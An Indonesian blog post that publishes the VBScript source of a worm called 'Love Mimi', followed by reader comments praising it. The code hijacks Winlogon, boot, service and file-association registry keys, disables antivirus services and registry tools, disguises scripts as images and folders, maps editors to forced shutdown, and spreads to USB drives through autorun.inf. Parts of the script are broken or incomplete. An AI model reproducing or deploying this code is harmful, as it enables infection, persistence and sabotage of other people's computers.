.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\WarningIfNotDefault”, “Hei! Knapa kamu mo liat rahasia aq? Wlaupun qt tmnan, aq ttp punya rahasia yg g blh kamu tau!”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ControlPanel\Hide\CheckedValue”, “1”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ControlPanel\Hide\DefaultValue”, “1”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SystemFileProtection\ShowPopup”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”, “C:\WINDOWS\system32\userinit.exe, c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell”, “explorer.exe, c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec”, “%SystemRoot%\system32\cmd.exe, c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PugPlay\ImagePath”, “%SystemRoot%\system32\services.exe, c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice\ImagePathservice”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NSCService\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVScan\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCDrv\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McDetect.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTskshd.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mcupdmgr.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer\ImagePath”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srservice\ImagePathservice”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\regedit\Shell\open\Command”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\open\command”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\edit\command”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\regedit\Shell\open\Command\”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\open\command\”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\edit\command\”, “c:\windows\svchost.exe ” & qi

.RegWrite “HKEY_CLASSES_ROOT\VBEFile\”, “JPEG Image”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBSFile\”, “File Folder”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\exefile\”, “my_mimi”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBEFile\FriendlyTypeName”, “JPEG Image”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName”, “File Folder”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\txtfileile\FriendlyTypeName”, “my_mimi documentation”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\”, dear.RegRead(“HKEY_CLASSES_ROOT\jpegfile\DefaultIcon\”)

.RegWrite “HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\”, dear.RegRead(“HKEY_CLASSES_ROOT\Folder\DefaultIcon\”)

.RegWrite “HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBSFile\Shell\Edit\Command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Open\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Open\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Repair\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Msi.Patch\shell\Open\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\batfile\shell\open\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\batfile\shell\edit\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\comfile\shell\open\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\cplfile\shell\cplopen\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\cplfile\shell\runas\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\Install\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\Install\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\open\command\”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\txtfile\shell\open\command\”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\txtfile\ScriptEngine\”, “VBScript.Encode”

.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\Scan For Viruses\Command\”, “c:\windows\svchost.exe ” & forest

.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\explore\command\command”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\open\command\command”, “wscript.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\edit\command”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\edit\command\command”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.Document.1\shell\open\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.Document.1\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.exe\shell\open\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.exe\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji

.RegWrite “HKEY_CLASSES_ROOT\Applications\cedt.exe\shell\open\command\”, “c:\windows\svchost.exe ” & mimi

.RegWrite “HKEY_CLASSES_ROOT\Applications\cedt.exe\shell\edit\command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”

.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\RegEdt32\Settings\ReadOnly”, 1, “REG_SZ”

.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\RegEdt32\Settings\ReadOnly”, 1, “REG_SZ”

end with

End Sub

Sub dwozmc()

on error resume next

Dim love, dear, drive, drives, folder, files, file, nama, path, vir, subfolder, meteran, elo, cari

Set love = createobject(StrReverse(“tcejbOmetsySelif.gnitpircS”))

set drive = love.GetLogicalDrives

For Each drive In drives

If drive.IsReady Then

cari drive & “\”

DoEvents

End If

Next

dwozmc()

End Sub

Function cari()

on error resume next

Set love = createobject(StrReverse(“tcejbOmetsySelif.gnitpircS”))

Set folder = love.GetFolder(path)

nama = folder.name

for each file in folder.files

set elo = love.getfile(File.path)

meteran = (elo.size)/1024

ext = love.GetExtensionName(File.Path)

ext = StrReverse(LCase(ext))

vir = love.getbasename(file.path)

if ext = “sbv” or ext = “ebv” or ext = “cod” or ext = “ftr” or ext = “fdp” or ext = “gpj” then

set broken = love.createtextfile(File.Path & “.vbe”, 1)

broken.write lost

set friendship = love.getfile(File.Path & “.vbe”)

friendship.Attributes = 33

if file.name = “cotox.vbs” or file.name = “kangen.exe” or file.name = “indra.com” or file.name = “MSOHEV.EXE” or file.name = “SVCH0ST.EXE” or file.name = “WINL0G0N.EXE” or file.name = “Surat_Buat_Presiden.zip” or file.name = “Surat_Buat_Presiden.exe” or file.name = “indra.exe” or file.name = “for_you.exe” or file.name = “indra.pif” or file.name = “hallo.exe” or file.name = “icute.vbs” or file.name = “frzstate.exe” or file.name = “I-Cute.vbs” or file.name = “Perfected_v5.vbe” or file.name = “animasi.exe” or file.name = “C.Stankal.com” then

love.DeleteFile(File.path)

DoEvents

End if

if file.name = “msvbvm60.dll” then

love.RenameFile(File.path & “my_mimi.dll”)

DoEvents

End if

if vir = nama and ext = “exe” then

love.DeleteFile(File.path)

end if

DoEvents

For Each Subfolder In Folder.SubFolders

kejar Subfolder.Path

DoEvents

Next

End If

Next

End Function

sub ontrus()

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe desktop.vbs”

set fs = createobject(“Scripting.FileSystemObject”)

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & “\desktop.vbs”)

tf.attributes = 0

set tf=fs.createtextfile(winpath & “\desktop.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & “\desktop.vbs”)

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

set tf = fs.getfile(flashdrive.path &”\desktop.vbs”)

tf.attributes = 0

set tf = fs.createtextfile(flashdrive.path &”\diary_mimi.vbe”,2,true)

tf.write mysource

tf.close

set tf = fs.createtextfile(flashdrive.path &”\desktop.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(flashdrive.path &”\desktop.vbs”)

tf.attributes = 39

set tf = fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 0

set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)

tf.write atr

tf.close

set tf = fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 39

on error resume next

set tf = fs.getfile(“c:\windows\system32\wscript.exe”)

tf.Attributes = 39

set tf = fs.getfile(“c:\windows\svchost.exe”)

tf.Attributes = 0

fs.copyfile “c:\windows\system32\wscript.exe”, “c:\windows\svchost.exe”

set tf = fs.getfile(“c:\windows\svchost.exe”)

tf.Attributes = 39

on error resume next

set tf = fs.getfile(“c:\windows\EXPL0RER.vbs”)

tf.attributes = 0

set tf = fs.createtextfile(“c:\windows\EXPL0RER.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(“c:\windows\EXPL0RER.vbs”)

tf.attributes = 39

on error resume next

set tf = fs.getfile(“c:\windows\system\WinUpdt.vbs”)

tf.attributes = 0

set tf = fs.createtextfile(“c:\windows\system\WinUpdt.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(“c:\windows\system\WinUpdt.vbs”)

tf.attributes = 39

tf.Close

set sd = createobject(“Wscript.shell”)

tachoor = “c:\windows\EXPL0RER.vbs”

sd.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32”, “c:\windows\svchost.exe ” & tachoor

end if

next

if check <> 1 then

Wscript.sleep 20000

end if

loop while check<>1

set sd = createobject(“Wscript.shell”)

sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

end sub
————–[akhir scrpt]——————–

4 Tanggapan to “Source code virus VBS Love Mimi by alienmars”

  1. purwanto said

    maz….mnta antidot removal mimi dong.cpt bls..
    thnks

  2. joni said

    kereeeeen….!!!

  3. z3veNt said

    scriptnx luar biasa browww…..tank’s na….? laen waktu aku juga bakal kasih kamu bantuan….muda-mudahan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: